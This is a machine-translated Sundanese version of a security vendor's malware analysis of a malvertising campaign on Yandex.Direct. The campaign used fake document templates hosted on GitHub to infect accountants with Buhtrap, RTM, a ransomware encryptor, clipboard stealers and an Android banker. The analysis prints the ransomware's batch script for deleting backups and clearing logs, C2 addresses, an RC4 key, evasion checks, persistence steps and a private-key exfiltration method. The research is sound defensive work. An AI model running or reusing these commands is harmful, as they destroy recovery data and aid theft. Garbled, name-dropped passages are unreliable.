Pikeun nargétkeun akuntan dina serangan cyber, anjeun tiasa nganggo dokumén padamelan anu aranjeunna milarian online. Ieu kasarna naon grup cyber geus ngalakonan salila sababaraha bulan kaliwat, ngadistribusikaeun backdoors dipikawanoh. и , kitu ogé encryptors jeung software pikeun maok cryptocurrencies. Paling target lokasina di Rusia. Serangan éta dilaksanakeun ku cara nempatkeun iklan jahat dina Yandex.Direct. Poténsi korban diarahkeun ka situs wéb dimana aranjeunna dipenta pikeun ngaunduh file jahat anu nyamar salaku template dokumén. Yandex ngahapus iklan jahat saatos peringatan kami.
Kodeu sumber Buhtrap parantos bocor online dina jaman baheula sahingga saha waé tiasa nganggo éta. Kami henteu gaduh inpormasi ngeunaan kasadiaan kode RTM.
Dina tulisan ieu kami bakal nyarioskeun ka anjeun kumaha panyerang nyebarkeun malware nganggo Yandex.Direct sareng di-host dina GitHub. Pos éta bakal disimpulkeun ku analisa téknis ngeunaan malware.
Buhtrap sareng RTM balik deui dina bisnis
Mékanisme panyebaran sareng korban
Rupa-rupa payloads dikirimkeun ka korban babagi mékanisme rambatan umum. Sadaya file jahat anu diciptakeun ku panyerang disimpen dina dua repositori GitHub anu béda.
Biasana, gudang ngandung hiji file jahat anu tiasa diunduh, anu sering robih. Kusabab GitHub ngamungkinkeun anjeun ningali sajarah parobihan kana gudang, urang tiasa ningali malware naon anu disebarkeun salami periode anu tangtu. Pikeun ngayakinkeun korban pikeun ngundeur file jahat, ramatloka blanki-shabloni24[.]ru, ditémbongkeun dina gambar di luhur, dipaké.
Desain situs sareng sadaya nami file jahat nuturkeun konsép tunggal - bentuk, témplat, kontrak, conto, jsb. Nganggap yén parangkat lunak Buhtrap sareng RTM parantos dianggo dina serangan akuntan baheula, kami nganggap yén strategi dina kampanye anyar sarua. Hiji-hijina patarosan nyaéta kumaha korban dugi ka situs panyerang.
Inféksi
Sahenteuna sababaraha korban poténsial anu réngsé dina situs ieu katarik ku iklan jahat. Di handap ieu conto URL:
https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456
Sakumaha anjeun tiasa tingali tina tautan, spanduk dipasang dina forum akuntansi anu sah bb.f2 [.]kz. Kadé dicatet yén spanduk mucunghul dina loka béda, kabéh miboga id kampanye sarua (blanki_rsya), sarta paling patali jeung akuntansi atawa jasa bantuan hukum. URL nunjukkeun yén calon korban nganggo pamundut "unduh formulir invoice," anu ngadukung hipotésis kami ngeunaan serangan anu dituju. Di handap ieu aya situs dimana spanduk muncul sareng patarosan milarian anu saluyu.
- undeuran formulir invoice – bb.f2[.]kz
- kontrak sampel - Ipopen [.]ru
- sampel keluhan aplikasi - 77metrov[.]ru
- formulir perjangjian - kosong-dogovor-kupli-prodazhi[.]ru
- petisi pangadilan sampel - zen.yandex[.]ru
- keluhan sampel - yurday[.]ru
- formulir kontrak sampel - Regforum[.]ru
- bentuk kontrak - assistentus [.]ru
- conto perjangjian apartemen - napravah[.]com
- sampel kontrak légal - avito[.]ru
The blanki-shabloni24[.]situs ru mungkin geus ngonpigurasi lulus hiji assessment visual basajan. Ilaharna, hiji iklan nu nunjuk ka situs profésional-pilari jeung tumbu ka GitHub teu sigana kawas hal écés goréng. Salaku tambahan, panyerang unggah file jahat ka gudang ngan ukur kanggo waktos kawates, sigana salami kampanye. Seringna, gudang GitHub ngandung arsip pos kosong atanapi file EXE kosong. Ku kituna, panyerang bisa ngadistribusikaeun iklan ngaliwatan Yandex.Direct dina situs anu paling dipikaresep dilongok ku akuntan anu datang dina respon kana queries pilarian husus.
Salajengna, hayu urang tingali rupa-rupa payloads anu disebarkeun ku cara ieu.
Analisis Payload
Kronologi distribusi
Kampanye jahat dimimitian dina ahir Oktober 2018 sareng aktip dina waktos nyerat. Kusabab sakabéh gudang sadia pikeun umum dina GitHub, urang disusun hiji timeline akurat ngeunaan distribusi genep kulawarga malware béda (tingali gambar di handap). Kami parantos nambihan garis anu nunjukkeun nalika tautan spanduk kapanggih, anu diukur ku telemétri ESET, pikeun ngabandingkeun sareng sajarah git. Sakumaha anjeun tiasa tingali, ieu pakait sareng kasadiaan payload dina GitHub. Penyimpangan dina ahir bulan Pebruari tiasa dijelaskeun ku kanyataan yén urang henteu ngagaduhan bagian tina sajarah parobihan sabab gudangna dipiceun tina GitHub sateuacan urang tiasa nampi lengkep.
Gambar 1. Kronologi distribusi malware.
Kode Signing Sértipikat
Kampanye ngagunakeun sababaraha sertipikat. Sababaraha ditandatanganan ku langkung ti hiji kulawarga malware, anu salajengna nunjukkeun yén sampel anu béda milik kampanye anu sami. Sanaos kasadiaan konci pribadi, operator henteu sacara sistematis nandatanganan binér sareng henteu nganggo konci pikeun sadaya conto. Dina ahir Pébruari 2019, panyerang mimiti nyiptakeun tanda tangan anu teu sah nganggo sertipikat milik Google anu aranjeunna henteu gaduh konci pribadi.
Sadaya sertipikat anu aub dina kampanye sareng kulawarga malware anu ditandatanganan didaptarkeun dina tabel di handap ieu.
Kami ogé parantos nganggo sertipikat penandatanganan kode ieu pikeun ngadegkeun tautan sareng kulawarga malware anu sanés. Kanggo sabagéan ageung sertipikat, kami henteu mendakan conto anu henteu disebarkeun ngaliwatan gudang GitHub. Sanajan kitu, sertipikat TOV "MARIYA" ieu dipaké pikeun asup malware milik botnet nu , adware jeung panambang. Henteu mungkin yén malware ieu aya hubunganana sareng kampanye ieu. Paling dipikaresep, sertipikat ieu dibeuli on darknet nu.
Win32 / Filecoder.Buhtrap
Komponén munggaran anu narik perhatian urang nyaéta Win32 / Filecoder.Buhtrap anu nembé kapendak. Ieu mangrupikeun file binér Delphi anu kadang dibungkus. Utamana disebarkeun dina bulan Pebruari–Maret 2019. Éta kalakuanana salaku program ransomware - milarian drive lokal sareng polder jaringan sareng énkripsi file anu dideteksi. Teu perlu sambungan Internet pikeun compromised sabab teu ngahubungan server pikeun ngirim konci enkripsi. Sabalikna, éta nambihan "token" kana tungtung pesen tebusan, sareng nyarankeun ngagunakeun email atanapi Bitmessage pikeun ngahubungi operator.
Pikeun encrypt saloba sumberdaya sénsitip sabisa, Filecoder.Buhtrap ngajalankeun thread dirancang pikeun mareuman software konci nu bisa boga pawang file kabuka ngandung émbaran berharga nu bisa ngaganggu enkripsi. Prosés sasaran utamana sistem manajemen database (DBMS). Salaku tambahan, Filecoder.Buhtrap mupus file log sareng cadangan pikeun nyéépkeun pamulihan data. Jang ngalampahkeun ieu, ngajalankeun skrip bets handap.
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled
Filecoder.Buhtrap ngagunakeun layanan IP Logger online anu sah anu dirancang pikeun ngumpulkeun inpormasi ngeunaan sémah halaman wéb. Ieu dimaksudkeun pikeun ngalacak korban ransomware, anu tanggung jawab baris paréntah:
mshta.exe "javascript:document.write('');"
File pikeun énkripsi dipilih upami henteu cocog sareng tilu daptar pangaluaran. Anu mimiti, file anu nganggo ekstensi di handap ieu henteu énkripsi: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys sareng .bat. Kadua, sadaya file anu jalur lengkepna ngandung senar diréktori tina daptar di handap ieu teu kalebet.
.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel
Katilu, ngaran koropak tangtu ogé teu kaasup kana énkripsi, diantarana ngaran koropak tina talatah tebusan. Daptar dibere handap. Jelas, sadaya iwal ieu dimaksudkeun pikeun ngajaga mesin jalan, tapi kalawan roadworthiness minimal.
boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe
Skéma énkripsi file
Sakali dieksekusi, malware ngahasilkeun pasangan konci RSA 512-bit. Éksponén swasta (d) sareng modulus (n) teras énkripsi ku konci umum 2048-bit (eksponén umum sareng modulus), dibungkus zlib, sareng disandi base64. Kodeu jawab ieu dipidangkeun dina Gambar 2.
Gambar 2. Hasil dekompilasi Hex-Rays tina prosés generasi pasangan konci RSA 512-bit.
Di handap ieu conto téks polos kalayan konci swasta dihasilkeun, nu mangrupakeun token napel pesen tebusan.
DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239
Konci publik panyerang dibere handap.
e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD
Berkas-berkas énkripsi nganggo AES-128-CBC kalayan konci 256-bit. Pikeun unggal file énkripsi, konci anyar sareng vektor inisialisasi énggal dibangkitkeun. Inpo konci ditambahkeun kana tungtung file énkripsi. Hayu urang nganggap format file énkripsi.
File énkripsi ngagaduhan lulugu ieu:
Data file sumber kalayan tambihan nilai sihir VEGA énkripsi kana 0x5000 bait munggaran. Sadaya inpormasi dekripsi digantelkeun kana file kalayan struktur ieu:
- Pananda ukuran file ngandung tanda anu nunjukkeun naha ukuran file langkung ageung tibatan 0x5000 bait
- Gumpalan konci AES = ZlibCompress(RSAEncrypt(konci AES + IV, konci umum tina pasangan konci RSA anu dihasilkeun))
- Gumpalan konci RSA = ZlibCompress(RSAEncrypt (konci swasta RSA dihasilkeun, konci umum RSA anu dikodekeun keras))
Win32 / ClipBanker
Win32/ClipBanker mangrupakeun komponén anu disebarkeun intermittently ti ahir Oktober nepi ka awal Désémber 2018. Peranna nyaéta pikeun ngawas eusi clipboard, éta milarian alamat dompét cryptocurrency. Saatos nangtukeun alamat dompét target, ClipBanker ngagentos ku alamat anu dipercaya milik operator. Sampel anu kami nalungtik henteu dikotak atanapi dikaburkeun. Hiji-hijina mékanisme anu dianggo pikeun masker kabiasaan nyaéta énkripsi string. Alamat dompét operator énkripsi nganggo RC4. Target cryptocurrencies nyaéta Bitcoin, Bitcoin cash, Dogecoin, Ethereum sareng Ripple.
Salila période malware ieu nyebarkeun ka dompet Bitcoin panyerang, jumlah leutik dikirim ka VTS, nu matak ragu kana kasuksésan kampanye. Salaku tambahan, teu aya bukti anu nunjukkeun yén transaksi ieu aya hubunganana sareng ClipBanker pisan.
Win32 / RTM
Komponén Win32 / RTM disebarkeun sababaraha dinten dina awal Maret 2019. RTM mangrupakeun bankir Trojan ditulis dina Delphi, aimed dina sistem perbankan jauh. Dina 2017, peneliti ESET diterbitkeun program ieu, pedaran masih relevan. Dina Januari 2019, Palo Alto Networks ogé dileupaskeun .
Buhtrap Loader
Pikeun sababaraha waktos, downloader sayogi dina GitHub anu henteu sami sareng alat Buhtrap sateuacana. Anjeunna tos ka https://94.100.18[.]67/RSS.php?<some_id> pikeun meunangkeun tahap salajengna jeung beban eta langsung kana memori. Urang bisa ngabedakeun dua paripolah kode tahap kadua. Dina URL kahiji, RSS.php langsung ngaliwatan Buhtrap backdoor - backdoor ieu pisan sarupa hiji sadia sanggeus kode sumber ieu bocor.
Narikna, urang ningali sababaraha kampanye sareng backdoor Buhtrap, sareng aranjeunna disangka dijalankeun ku operator anu béda. Dina hal ieu, bédana utama nyaéta yén backdoor dimuat langsung kana mémori sareng henteu nganggo skéma biasa sareng prosés panyebaran DLL anu urang bahas. . Sajaba ti éta, operator robah konci RC4 dipaké pikeun encrypt lalulintas jaringan ka server C&C. Dina kalolobaan kampanye anu urang tingali, operator henteu ganggu ngarobih konci ieu.
Kadua, paripolah anu langkung kompleks nyaéta yén URL RSS.php disalurkeun ka pamuat anu sanés. Ieu dilaksanakeun sababaraha obfuscation, kayaning rebuilding tabel impor dinamis. Tujuan bootloader nyaéta ngahubungan server C&C [.]com/api/F27F84EDA4D13B15/2, kirimkeun log sareng ngantosan réspon. Éta ngolah réspon salaku gumpalan, ngamuat kana mémori sareng ngalaksanakeunana. The payload kami nempo executing loader ieu sarua Buhtrap backdoor, tapi meureun aya komponén séjén.
Android / Spy.Banker
Narikna, komponén pikeun Android ogé kapanggih dina gudang GitHub. Anjeunna di cabang utama ngan ukur sadinten - 1 Nopémber 2018. Salian ti dipasang dina GitHub, telemétri ESET henteu mendakan bukti yén malware ieu disebarkeun.
Komponén ieu di-host salaku Paket Aplikasi Android (APK). Ieu beurat obfuscated. Paripolah jahat disumputkeun dina JAR énkripsi anu aya dina APK. Éta énkripsi sareng RC4 nganggo konci ieu:
key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]
Konci sareng algoritma anu sami dianggo pikeun énkripsi senar. JAR berlokasi di APK_ROOT + image/files. 4 bait munggaran file ngandung panjang JAR énkripsi, anu dimimitian langsung saatos widang panjang.
Saatos ngadekrip file, kami mendakan yén éta Anubis - sateuacana bankir pikeun Android. Malware gaduh fitur ieu:
- ngarékam mikropon
- nyokot Potret layar
- meunang koordinat GPS
- keylogger
- énkripsi data alat sareng paménta tebusan
- ngirim spam
Narikna, bankir ngagunakeun Twitter salaku saluran komunikasi cadangan pikeun kéngingkeun server C&C anu sanés. Sampel anu kami analisa nganggo akun @JonesTrader, tapi dina waktos analisa éta parantos diblokir.
Bankir ngandung daptar aplikasi target dina alat Android. Éta langkung panjang tibatan daptar anu dicandak dina pangajaran Sophos. Daptar éta kalebet seueur aplikasi perbankan, program balanja online sapertos Amazon sareng eBay, sareng jasa cryptocurrency.
MSIL/ClipBanker.IH
Komponén terakhir anu disebarkeun salaku bagian tina kampanye ieu nyaéta .NET Windows executable, anu muncul dina Maret 2019. Kalolobaan vérsi anu ditalungtik dipak ku ConfuserEx v1.0.0. Kawas ClipBanker, komponén ieu ngagunakeun clipboard. Tujuanana nya éta rupa-rupa cryptocurrencies, kitu ogé nawaran on uap. Salaku tambahan, anjeunna nganggo jasa IP Logger pikeun maok konci WIF swasta Bitcoin.
Mékanisme panyalindungan
Salian kauntungan anu disayogikeun ku ConfuserEx pikeun nyegah debugging, dumping, sareng tampering, komponénna kalebet kamampuan pikeun ngadeteksi produk antipirus sareng mesin virtual.
Pikeun pariksa yén éta jalan dina mesin virtual, malware ngagunakeun garis paréntah Windows WMI (WMIC) anu diwangun pikeun nyuhunkeun inpormasi BIOS, nyaéta:
wmic bios
Lajeng program parses kaluaran paréntah sarta néangan kecap konci: VBOX, VirtualBox, XEN, qemu, bochs, VM.
Pikeun ngadeteksi produk antipirus, malware ngirim pamundut Windows Management Instrumentation (WMI) ka Windows Security Center nganggo ManagementObjectSearcher API sakumaha ditémbongkeun di handap ieu. Saatos decoding tina base64 sauran sapertos kieu:
ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')
Gambar 3. Prosés pikeun ngaidentipikasi produk antipirus.
Salaku tambahan, malware mariksa naha , alat pikeun ngajaga tina serangan clipboard sareng, upami jalan, ngagantungkeun sadaya utas dina prosés éta, ku kituna nganonaktipkeun panyalindungan.
Kegigihan
Versi malware anu urang pelajari nyalin sorangan %APPDATA%googleupdater.exe tur nyetel atribut "disumputkeun" pikeun diréktori google. Lajeng manehna ngarobah nilai SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell dina pendaptaran Windows sareng nambihan jalur updater.exe. Ku cara ieu, malware bakal dieksekusi unggal waktos pangguna asup.
Kalakuan jahat
Sapertos ClipBanker, malware ngawas eusi clipboard sareng milarian alamat dompét cryptocurrency, sareng nalika kapendak, ngagentos ku salah sahiji alamat operator. Di handap ieu daptar alamat target dumasar kana naon anu kapanggih dina kode.
BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL
Pikeun unggal jenis alamat aya éksprési biasa pakait. Nilai STEAM_URL dianggo pikeun nyerang sistem uap, sapertos tiasa ditingali tina ekspresi biasa anu dianggo pikeun ngartikeun dina panyangga:
b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b
Saluran éksfiltrasi
Salian ngagentos alamat dina panyangga, malware nargétkeun konci WIF swasta Bitcoin, Bitcoin Core sareng Electrum Bitcoin dompét. Program éta ngagunakeun plogger.org salaku saluran éksfiltrasi pikeun kéngingkeun konci pribadi WIF. Jang ngalampahkeun ieu, operator nambahkeun data konci swasta kana lulugu HTTP pamaké-Agen, sakumaha ditémbongkeun di handap ieu.
angka 4. IP Logger konsol jeung data kaluaran.
Operator henteu nganggo iplogger.org pikeun ngaluarkeun dompét. Éta meureun resorted ka métode béda alatan 255 wates karakter dina widang User-Agentdipintonkeun dina panganteur wéb IP Logger. Dina sampel anu urang pelajari, server kaluaran anu sanés disimpen dina variabel lingkungan DiscordWebHook. Ahéng, variabel lingkungan ieu henteu ditugaskeun di mana waé dina kode éta. Ieu nunjukkeun yén malware masih aya dina pamekaran sareng variabel ditugaskeun ka mesin uji operator.
Aya tanda sanés yén program éta aya dina pamekaran. Berkas binér kalebet dua URL iplogger.org, sareng duanana ditaros nalika data dieksfiltrasi. Dina pamundut ka salah sahiji URL ieu, nilai dina widang Referer dimimitian ku "DEV /". Kami ogé mendakan versi anu henteu dibungkus nganggo ConfuserEx, anu nampi URL ieu namina DevFeedbackUrl. Dumasar kana nami variabel lingkungan, kami yakin yén operator ngarencanakeun ngagunakeun jasa Discord anu sah sareng sistem interception wébna pikeun maok dompet cryptocurrency.
kacindekan
Kampanye ieu mangrupikeun conto panggunaan jasa iklan anu sah dina serangan cyber. Skéma na nargétkeun organisasi Rusia, tapi urang moal reuwas ningali serangan sapertos nganggo jasa non-Rusia. Pikeun ngahindarkeun kompromi, pangguna kedah yakin kana reputasi sumber parangkat lunak anu aranjeunna unduh.
Daptar lengkep indikator kompromi sareng atribut MITRE ATT&CK sayogi di .
sumber: www.habr.com